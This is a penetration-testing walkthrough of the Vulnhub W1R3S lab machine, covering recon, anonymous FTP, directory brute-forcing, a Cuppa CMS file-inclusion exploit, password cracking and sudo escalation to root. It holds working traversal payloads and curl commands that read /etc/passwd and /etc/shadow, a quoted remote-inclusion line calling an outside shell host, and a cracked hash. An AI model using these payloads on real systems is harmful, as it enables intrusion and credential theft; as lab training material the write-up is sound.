Vulnhub-w1r3s Target Machine Penetration Walkthrough
Target Discovery
Since we are on the internal network in the same subnet, we can simply scan with arp-scan (it needs raw-socket privileges, hence running as root; the two MAC/Vendor warnings below only mean the OUI lookup files could not be read, which is why every vendor shows as Unknown):
┌──(root㉿kali)-[/home/kali]
└─# arp-scan 192.168.120.0/24
Interface: eth0, type: EN10MB, MAC: 00:0c:29:ab:50:b1, IPv4: 192.168.120.160
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.120.1 00:50:56:c0:00:08 (Unknown)
192.168.120.2 00:50:56:f6:91:bf (Unknown)
192.168.120.169 00:0c:29:04:07:85 (Unknown)
192.168.120.254 00:50:56:e7:f0:fe (Unknown)
6 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.082 seconds (122.96 hosts/sec). 4 responded
So the target host's IP is 192.168.120.169. The other three responders (192.168.120.1, .2 and .254, all with the 00:50:56 VMware OUI) are typically the host's virtual adapter, the NAT device and the DHCP server of the virtual network, not targets.
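As an added example (my own script, not from the write-up), the same triage done mechanically: filter the arp-scan listing for the VMware guest OUI and exclude our own address. The listing is constructed from the scan above, and the OUI rule (00:0c:29 for auto-generated guest MACs, 00:50:56 for VMware's own host adapter, NAT and DHCP devices) is an assumption that holds for Workstation-style labs.

```shell
# Added example (mine, not from the write-up): pick the guest VM out of an arp-scan
# listing. Assumption: VMware Workstation hands guests auto-generated 00:0c:29 MACs,
# while its own host adapter, NAT device and DHCP server use 00:50:56.
# The listing below is constructed from the scan in the write-up.
ARP_SCAN_OUTPUT='Interface: eth0, type: EN10MB, MAC: 00:0c:29:ab:50:b1, IPv4: 192.168.120.160
192.168.120.1   00:50:56:c0:00:08   (Unknown)
192.168.120.2   00:50:56:f6:91:bf   (Unknown)
192.168.120.169 00:0c:29:04:07:85   (Unknown)
192.168.120.254 00:50:56:e7:f0:fe   (Unknown)
4 responded'

# find_guests LISTING: print the IP of every responder whose MAC carries the guest
# OUI, skipping our own address (taken from the Interface: line) should it appear.
find_guests() {
  printf '%s\n' "$1" | awk '
    /^Interface:/ { for (i = 1; i <= NF; i++) if ($i == "IPv4:") me = $(i + 1) }
    $1 ~ /^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$/ && tolower($2) ~ /^00:0c:29:/ && $1 != me { print $1 }'
}

find_guests "$ARP_SCAN_OUTPUT"
```

Against a live network: find_guests "$(arp-scan 192.168.120.0/24)". The OUI rule is a lab convenience; outside a VMware lab, confirm candidates with the full nmap scan rather than trusting a vendor prefix.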
Information Gathering
Port Scanning
Use nmap to scan the target's ports and find out which are open and what service versions they run.
Full TCP port sweep (-p- covers all 65535 ports; --min-rate only speeds things up on a local network):
┌──(root㉿kali)-[/home/kali]
└─# nmap -sS -p- 192.168.120.169 --min-rate=10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-01 22:35 EDT
Nmap scan report for 192.168.120.169
Host is up (0.00039s latency).
Not shown: 55528 filtered tcp ports (no-response), 10003 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
MAC Address: 00:0C:29:04:07:85 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 12.58 seconds
Service and version scan of those ports (-A also runs OS detection; because only open ports are passed in, nmap warns below that the OS guess is unreliable):
┌──(root㉿kali)-[/home/kali]
└─# nmap -sS -sV -p21,22,80,3306 -A 192.168.120.169 --min-rate=10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-01 22:39 EDT
Nmap scan report for 192.168.120.169
Host is up (0.00064s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxr-xr-x 2 ftp ftp 4096 Jan 23 2018 content
| drwxr-xr-x 2 ftp ftp 4096 Jan 23 2018 docs
|_drwxr-xr-x 2 ftp ftp 4096 Jan 28 2018 new-employees
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.120.160
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 07:e3:5a:5c:c8:18:65:b0:5f:6e:f7:75:c7:7e:11:e0 (RSA)
| 256 03:ab:9a:ed:0c:9b:32:26:44:13:ad:b0:b0:96:c3:1e (ECDSA)
|_ 256 3d:6d:d2:4b:46:e8:c9:a3:49:e0:93:56:22:2e:e3:54 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 00:0C:29:04:07:85 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (97%), Linux 3.2 - 4.9 (97%), Linux 5.1 (95%), Linux 3.13 - 3.16 (93%), Linux 4.10 (93%), Linux 3.4 - 3.10 (93%), Linux 3.10 (93%), Linux 4.4 (92%), Synology DiskStation Manager 5.2-5644 (92%), Linux 3.16 - 4.6 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: W1R3S.inc; OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.64 ms 192.168.120.169
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.09 seconds
From this we get:
- FTP allows anonymous login and already contains several directories;
- SSH is open and worth trying once we have user credentials;
- A website on the standard port;
- A MySQL port exposed on the network; the (unauthorized) marker means the server answered but refuses connections from our host, so it cannot be used directly;
Anonymous FTP Access
Connect to the FTP server and pull its files (the interactive session below negotiates passive mode; the wget mirror uses --no-passive-ftp, i.e. active mode, which only works here because the target can connect back to us on the same subnet; behind NAT or a firewall, drop that flag):
┌──(root㉿kali)-[/home/kali/Downloads]
└─# ftp 192.168.120.169
Connected to 192.168.120.169.
220 Welcome to W1R3S.inc FTP service.
Name (192.168.120.169:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||42567|)
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Jan 23 2018 content
drwxr-xr-x 2 ftp ftp 4096 Jan 23 2018 docs
drwxr-xr-x 2 ftp ftp 4096 Jan 28 2018 new-employees
226 Directory send OK.
ftp> pwd
Remote directory: /
ftp> quit
221 Goodbye.
┌──(root㉿kali)-[/home/kali/Downloads]
└─# wget -r --no-passive-ftp ftp://192.168.120.169/
.......
FINISHED --2025-04-01 22:50:56--
Total wall clock time: 0.1s
Downloaded: 5 files, 1.0K in 0s (7.36 MB/s)
┌──(root㉿kali)-[/home/kali/Downloads]
└─# tree ./
./
├── content
│ ├── 01.txt
│ ├── 02.txt
│ └── 03.txt
├── docs
│ └── worktodo.txt
└── new-employees
└── employee-names.txt
4 directories, 5 files
View the contents of all the files:
┌──(root㉿kali)-[/home/kali/Downloads/content]
└─# cat 01.txt
New FTP Server For W1R3S.inc
┌──(root㉿kali)-[/home/kali/Downloads/content]
└─# cat 02.txt
#
#
#
#
#
#
#
#
01ec2d8fc11c493b25029fb1f47f39ce
#
#
#
#
#
#
#
#
#
#
#
#
#
SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg==
############################################
┌──(root㉿kali)-[/home/kali/Downloads/content]
└─# cat 03.txt
___________.__ __ __ ______________________ _________ .__
\__ ___/| |__ ____ / \ / \/_ \______ \_____ \ / _____/ |__| ____ ____
| | | | \_/ __ \ \ \/\/ / | || _/ _(__ < \_____ \ | |/ \_/ ___\
| | | Y \ ___/ \ / | || | \/ \/ \ | | | \ \___
|____| |___| /\___ > \__/\ / |___||____|_ /______ /_______ / /\ |__|___| /\___ >
\/ \/ \/ \/ \/ \/ \/ \/ \/
┌──(root㉿kali)-[/home/kali/Downloads]
└─# cat docs/worktodo.txt
ı pou,ʇ ʇɥıuʞ ʇɥıs ıs ʇɥǝ ʍɐʎ ʇo ɹooʇ¡
....punoɹɐ ƃuıʎɐןd doʇs ‘op oʇ ʞɹoʍ ɟo ʇoן ɐ ǝʌɐɥ ǝʍ
┌──(root㉿kali)-[/home/kali/Downloads]
└─# cat new-employees/employee-names.txt
The W1R3S.inc employee list
Naomi.W - Manager
Hector.A - IT Dept
Joseph.G - Web Design
Albert.O - Web Design
Gina.L - Inventory
Rico.D - Human Resources
From these we can extract the following:
- There is a new FTP site: W1R3S.inc;
- Two strings that look encoded:
  01ec2d8fc11c493b25029fb1f47f39ce is a 32-character hex string, consistent with an MD5 digest; an online hash lookup returns the plaintext: This is not a password
  SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg== is base64; decoded: It is easy, but not that easy..
- An ASCII-art rendering of the site name already seen above;
- Two sentences rendered upside-down; flipped back they read: we have a lot of work to do, stop playing around …… I don't think this is the way to root!
- An employee/department list: Naomi.W - Manager, Hector.A - IT Dept, Joseph.G - Web Design, Albert.O - Web Design, Gina.L - Inventory, Rico.D - Human Resources. Usable as a username list for SSH brute-forcing.
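The decoding above can be reproduced offline. The following is an added example (my own script, not part of the original write-up): it decodes the base64 string, confirms the MD5 lookup locally, and maps the upside-down glyphs back to ASCII. The inputs are copied from the files above; the glyph table in unflip() is an assumption that covers only the characters occurring in worktodo.txt.

```shell
# Added example (mine, not from the write-up): decode the three artefacts from the FTP
# share offline. Inputs are copied from the files shown above; the glyph table in
# unflip() is my own and only covers the characters that occur in worktodo.txt.
HASH='01ec2d8fc11c493b25029fb1f47f39ce'
B64='SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg=='
LINE1='ı pou,ʇ ʇɥıuʞ ʇɥıs ıs ʇɥǝ ʍɐʎ ʇo ɹooʇ¡'
LINE2='....punoɹɐ ƃuıʎɐןd doʇs ‘op oʇ ʞɹoʍ ɟo ʇoן ɐ ǝʌɐɥ ǝʍ'

# decode_b64 STRING: strict decode; base64 -d rejects junk instead of guessing
decode_b64() { printf '%s' "$1" | base64 -d; }

# md5_matches HASH CANDIDATE: confirm an online lookup locally. printf, not echo:
# a trailing newline changes the digest and is the usual cause of a false mismatch.
md5_matches() { [ "$(printf '%s' "$2" | md5sum | cut -d' ' -f1)" = "$1" ]; }

# unflip STRING: map upside-down glyphs back to ASCII, keeping character order.
# p/d and u/n are each other's flips, so they go through tr (which swaps atomically);
# the multibyte glyphs go through sed, where comma -> apostrophe must run before
# the flipped quote (U+2018) -> comma, or the new comma would be converted too.
unflip() {
  printf '%s\n' "$1" | tr 'pdun' 'dpnu' | sed \
    -e 's/ı/i/g' -e 's/ʇ/t/g' -e 's/ɥ/h/g' -e 's/ʞ/k/g' -e 's/ǝ/e/g' \
    -e 's/ʍ/w/g' -e 's/ɐ/a/g' -e 's/ʎ/y/g' -e 's/ɹ/r/g' -e 's/ƃ/g/g' \
    -e 's/ן/l/g' -e 's/ɟ/f/g' -e 's/ʌ/v/g' -e 's/¡/!/g' -e "s/,/'/g" -e 's/‘/,/g'
}

# reverse_line: reverse each line of stdin (awk rather than rev, so it runs anywhere)
reverse_line() { awk '{ s = ""; for (i = length($0); i > 0; i--) s = s substr($0, i, 1); print s }'; }

decode_b64 "$B64"; echo
md5_matches "$HASH" 'This is not a password' && echo 'MD5 lookup confirmed'
unflip "$LINE1"                  # first line was only glyph-flipped
unflip "$LINE2" | reverse_line   # second line was rotated: flipped and reversed
```

Note the asymmetry in worktodo.txt: the first line is only glyph-flipped, while the second was rotated 180 degrees (flipped and reversed), which is why only the second goes through reverse_line.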
Website Access
The site root is just the default Apache configuration page

It tells us:
- apache 2.4.18
- ubuntu
Directory Scanning
Use gobuster to brute-force directories and files and see whether anything else is exposed (the extension list is deliberately broad: backup, config and VCS leftovers such as .bak, .swp, .env and .git are common finds):
┌──(root㉿kali)-[/home/kali/Downloads]
└─# gobuster dir -u http://192.168.120.169 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt,js,asp,aspx,jsp,bak,swp,config,env,json,log,git -t 100 -b 404,400
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.120.169
[+] Method: GET
[+] Threads: 100
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404,400
[+] User Agent: gobuster/3.6
[+] Extensions: config,env,log,php,txt,js,asp,jsp,swp,json,git,html,aspx,bak
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 11321]
/.html (Status: 403) [Size: 295]
/wordpress (Status: 301) [Size: 322] [--> http://192.168.120.169/wordpress/]
/.php (Status: 403) [Size: 294]
/javascript (Status: 301) [Size: 323] [--> http://192.168.120.169/javascript/]
/administrator (Status: 301) [Size: 326] [--> http://192.168.120.169/administrator/]
/.php (Status: 403) [Size: 294]
/.html (Status: 403) [Size: 295]
/server-status (Status: 403) [Size: 303]
Progress: 3308400 / 3308415 (100.00%)
===============================================================
Finished
===============================================================
Several paths came back:
- http://192.168.120.169/wordpress/
- http://192.168.120.169/javascript/
- http://192.168.120.169/administrator/
Only the last one, http://192.168.120.169/administrator/, is useful: it is a backend installation page


After filling in arbitrary details, it reports that the user could not be created for lack of administrator privileges:

Second Directory Scan
With no other leads, scan again, this time under /administrator/, to see whether more files are exposed there:
┌──(root㉿kali)-[/home/kali/Downloads]
└─# gobuster dir -u http://192.168.120.169/administrator/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt,js,asp,aspx,jsp,bak,swp,config,env,json,log,git -t 100 -b 404,400
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.120.169/administrator/
[+] Method: GET
[+] Threads: 100
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 400,404
[+] User Agent: gobuster/3.6
[+] Extensions: php,asp,aspx,json,log,git,html,txt,js,jsp,bak,swp,config,env
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 309]
/.php (Status: 403) [Size: 308]
/index.php (Status: 302) [Size: 6955] [--> installation/]
/media (Status: 301) [Size: 332] [--> http://192.168.120.169/administrator/media/]
/templates (Status: 301) [Size: 336] [--> http://192.168.120.169/administrator/templates/]
/alerts (Status: 301) [Size: 333] [--> http://192.168.120.169/administrator/alerts/]
/language (Status: 301) [Size: 335] [--> http://192.168.120.169/administrator/language/]
/js (Status: 301) [Size: 329] [--> http://192.168.120.169/administrator/js/]
/components (Status: 301) [Size: 337] [--> http://192.168.120.169/administrator/components/]
/api (Status: 301) [Size: 330] [--> http://192.168.120.169/administrator/api/]
/classes (Status: 301) [Size: 334] [--> http://192.168.120.169/administrator/classes/]
/extensions (Status: 301) [Size: 337] [--> http://192.168.120.169/administrator/extensions/]
/robots.txt (Status: 200) [Size: 26]
/installation (Status: 301) [Size: 339] [--> http://192.168.120.169/administrator/installation/]
/Configuration.php (Status: 200) [Size: 0]
/.html (Status: 403) [Size: 309]
/.php (Status: 403) [Size: 308]
Progress: 3308400 / 3308415 (100.00%)
===============================================================
Finished
===============================================================
Browsing the listed directories, a file under /media/files turned out to contain the super administrator's account details (note also Configuration.php returning 200 with size 0: the PHP is executed server-side and prints nothing, so its contents cannot be read by simply requesting it):

At this point we have:
- the admin account details
- the CMS the site is built on: cuppa
Known CMS Vulnerabilities
Searching for known CMS vulnerabilities
With no other leads so far, and even without knowing the CMS version, first check whether the CMS has known vulnerabilities:
┌──(root㉿kali)-[/home/kali/Downloads]
└─# searchsploit cuppa
-------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------- ---------------------------------
Cuppa CMS - '/alertConfigField.php' Local/Remote File Inclusion | php/webapps/25971.txt
-------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
The exploit database shows an arbitrary file inclusion issue:
#####################################################
EXPLOIT
#####################################################
http://target/cuppa/alerts/alertConfigField.php?urlConfig=http://www.shell.com/shell.txt?
http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
Moreover, We could access Configuration.php source code via PHPStream
For Example:
-----------------------------------------------------------------------------
http://target/cuppa/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php
-----------------------------------------------------------------------------
Per the description, both local and remote file inclusion are possible
Exploiting the known vulnerability
Requesting http://192.168.120.169/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd to read the file gives no output:

Submitting the same parameter via POST instead, the file contents come back in the returned page:

Next, read /etc/shadow the same way:

That works too (note what it implies: /etc/shadow is normally readable only by root and the shadow group, so the PHP process on this box runs with more privilege than a default www-data user), so we can try cracking the user passwords with john.
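As an added example (my own helper functions, not the page's nor Cuppa CMS's code), the two request forms from the exploit-db entry wrapped for reuse: the plain traversal used above for text files, and the php://filter form for PHP sources, which include() would otherwise execute rather than display. Endpoint, traversal depth and the POST method follow the write-up; the HTML fragment used to exercise the decoder is constructed.

```shell
# Added example (mine, not the page's nor Cuppa CMS's code): the two request forms
# from the exploit-db entry, wrapped for reuse. Endpoint, traversal depth and POST
# follow the write-up; the HTML fragment used to exercise the decoder is constructed.
LFI_ENDPOINT='/administrator/alerts/alertConfigField.php'

# lfi_body PATH [raw|b64]: build the urlConfig parameter.
#   raw  traversal to an absolute path, for text files (/etc/passwd, /etc/shadow)
#   b64  php://filter wrapper, for PHP sources such as ../Configuration.php: without
#        the filter include() executes the file and shows nothing, with it the
#        source comes back base64-encoded
lfi_body() {
  case "${2:-raw}" in
    raw) printf 'urlConfig=../../../../../../../../..%s' "$1" ;;
    b64) printf 'urlConfig=php://filter/convert.base64-encode/resource=%s' "$1" ;;
    *)   echo "lfi_body: unknown mode '$2'" >&2; return 1 ;;
  esac
}

# lfi_read HOST PATH [raw|b64]: POST the parameter (GET gave no output on this box).
# --data-urlencode percent-encodes the value part; PHP decodes it again before use.
lfi_read() {
  curl -s -X POST --data-urlencode "$(lfi_body "$2" "${3:-raw}")" "http://$1$LFI_ENDPOINT"
}

# b64_extract: pull the first long base64 run out of the returned HTML and decode it
b64_extract() { grep -oE '[A-Za-z0-9+/]{16,}={0,2}' | head -n 1 | base64 -d; }

lfi_body /etc/passwd; echo
lfi_body ../Configuration.php b64; echo
```

Usage against the box: lfi_read 192.168.120.169 /etc/passwd > passwd.txt, and lfi_read 192.168.120.169 ../Configuration.php b64 | b64_extract to recover a PHP file's source instead of its (empty) output.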
After tidying up the output, search the passwd file for users with a home directory under /home/; there are two:
┌──(root㉿kali)-[/home/kali/Downloads]
└─# cat passwd.txt| grep -iF "/home/"
syslog:x:104:108::/home/syslog:/bin/false
w1r3s:x:1000:1000:w1r3s,,,:/home/w1r3s:/bin/bash
The interesting name is w1r3s: syslog is a system account whose shell is /bin/false, while w1r3s (uid 1000, /bin/bash) is the interactive user. Find its shadow entry and crack that.
PS:
The files can also be fetched with curl:
curl -X POST -d urlConfig=../../../../../../../../../etc/passwd http://192.168.120.169/administrator/alerts/alertConfigField.php
curl -X POST -d urlConfig=../../../../../../../../../etc/shadow http://192.168.120.169/administrator/alerts/alertConfigField.php
Password Cracking
Merge the passwd and shadow files with unshadow and run john against the result with the rockyou wordlist:
┌──(root㉿kali)-[/home/kali/Downloads]
└─# unshadow passwd.txt shadow.txt > password.txt
┌──(root㉿kali)-[/home/kali/Downloads]
└─# cat password.txt
w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:1000:1000:w1r3s,,,:/home/w1r3s:/bin/bash
┌──(root㉿kali)-[/home/kali/Downloads]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt password.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
computer (w1r3s)
1g 0:00:00:00 DONE (2025-04-02 03:11) 5.882g/s 1505p/s 1505c/s 1505C/s 123456..freedom
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Password found: computer
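An added example (mine, not from the write-up) covering the two steps above: choosing which accounts are worth cracking, which the grep for /home/ does only approximately (it keeps syslog, whose shell is /bin/false, and misses root), and re-checking john's result against the hash with openssl. The passwd and shadow lines are constructed from the page; only the w1r3s hash is real, the root and syslog shadow entries are made-up locked accounts.

```shell
# Added example (mine, not from the write-up): choose which accounts are worth
# cracking, then re-check john's answer against the hash without john. The passwd
# and shadow lines are constructed from the page; only the w1r3s hash is real, the
# root and syslog shadow entries are made-up locked accounts.
PASSWD='root:x:0:0:root:/root:/bin/bash
syslog:x:104:108::/home/syslog:/bin/false
w1r3s:x:1000:1000:w1r3s,,,:/home/w1r3s:/bin/bash'
W1R3S_HASH='$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.'
SHADOW="root:!:17553:0:99999:7:::
syslog:*:17553:0:99999:7:::
w1r3s:$W1R3S_HASH:17553:0:99999:7:::"

# crackable_users PASSWD SHADOW: accounts with a login shell and a real hash.
# grep -iF /home/ alone would keep syslog (/bin/false) and drop root (/root).
crackable_users() {
  printf '%s\n' "$1" | awk -F: -v shadow="$2" '
    BEGIN { n = split(shadow, lines, "\n")
            for (i = 1; i <= n; i++) { split(lines[i], f, ":"); hash[f[1]] = f[2] } }
    $7 !~ /(false|nologin|sync|halt|shutdown)$/ && hash[$1] ~ /^\$/ { print $1 }'
}

# verify_crypt HASH PASSWORD: recompute sha512crypt with the hash's own salt
# (field 3 of $6$salt$digest). openssl >= 1.1.1 knows -6; rounds default to the
# 5000 john reported, so a correct guess reproduces the string byte for byte.
verify_crypt() {
  salt=$(printf '%s' "$1" | cut -d'$' -f3)
  [ "$(openssl passwd -6 -salt "$salt" "$2")" = "$1" ]
}

crackable_users "$PASSWD" "$SHADOW"
verify_crypt "$W1R3S_HASH" computer && echo 'w1r3s:computer verified'
```

On the real files: crackable_users "$(cat passwd.txt)" "$(cat shadow.txt)". Feeding john only these entries avoids wasting time on locked system accounts, and verify_crypt is a quick sanity check before typing a cracked password into a live service.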
SSH Login
Log in over SSH with the recovered credentials:
┌──(root㉿kali)-[/home/kali/Downloads]
└─# ssh w1r3s@192.168.120.169
The authenticity of host '192.168.120.169 (192.168.120.169)' can't be established.
ED25519 key fingerprint is SHA256:Bue5VbUKeMSJMQdicmcMPTCv6xvD7I+20Ki8Um8gcWM.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.120.169' (ED25519) to the list of known hosts.
----------------------
Think this is the way?
----------------------
Well,........possibly.
----------------------
w1r3s@192.168.120.169's password:
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.13.0-36-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
108 packages can be updated.
6 updates are security updates.
.....You made it huh?....
Last login: Mon Jan 22 22:47:27 2018 from 192.168.0.35
w1r3s@W1R3S:~$ id
uid=1000(w1r3s) gid=1000(w1r3s) groups=1000(w1r3s),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
Privilege Escalation
The id output already shows w1r3s in group 27(sudo), so check the sudo rules:
w1r3s@W1R3S:~$ sudo -l
[sudo] password for w1r3s:
Matching Defaults entries for w1r3s on W1R3S.localdomain:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User w1r3s may run the following commands on W1R3S.localdomain:
(ALL : ALL) ALL
(ALL : ALL) ALL means the current user may run any command as any user and group through sudo (it prompts for the w1r3s password, which we already have), so simply run sudo /bin/bash for a root shell:
w1r3s@W1R3S:~$ sudo /bin/bash
root@W1R3S:~# id
uid=0(root) gid=0(root) groups=0(root)
Root shell obtained.
Grab the flag:
root@W1R3S:~# cd /root
root@W1R3S:/root# ls
flag.txt
root@W1R3S:/root# cat flag.txt
-----------------------------------------------------------------------------------------
____ ___ _ _ ____ ____ _ _____ _ _ _ _ _____ ___ ___ _ _ ____
/ ___/ _ \| \ | |/ ___| _ \ / \|_ _| | | | | / \|_ _|_ _/ _ \| \ | / ___|
| | | | | | \| | | _| |_) | / _ \ | | | | | | | / _ \ | | | | | | | \| \___ \
| |__| |_| | |\ | |_| | _ < / ___ \| | | |_| | |___ / ___ \| | | | |_| | |\ |___) |
\____\___/|_| \_|\____|_| \_\/_/ \_\_| \___/|_____/_/ \_\_| |___\___/|_| \_|____/
-----------------------------------------------------------------------------------------
.-----------------TTTT_-----_______
/''''''''''(______O] ----------____ \______/]_
__...---'"""\_ --'' Q ___________@
|''' ._ _______________=---------"""""""
| ..--''| l L |_l |
| ..--'' . /-___j ' '
| ..--'' / , ' '
|--'' / ` \
L__' \ -
- '-.
'. /
'-./
----------------------------------------------------------------------------------------
YOU HAVE COMPLETED THE
__ __ ______________________ _________
/ \ / \/_ \______ \_____ \ / _____/
\ \/\/ / | || _/ _(__ < \_____ \
\ / | || | \/ \/ \
\__/\ / |___||____|_ /______ /_______ /.INC
\/ \/ \/ \/ CHALLENGE, V 1.0
----------------------------------------------------------------------------------------
CREATED BY SpecterWires
----------------------------------------------------------------------------------------
Summary
Once again the decisive step is information gathering: enumerating the FTP share, the directory structure and the CMS is what surfaced the sensitive files and the vulnerable component, and that is what made the final win possible.
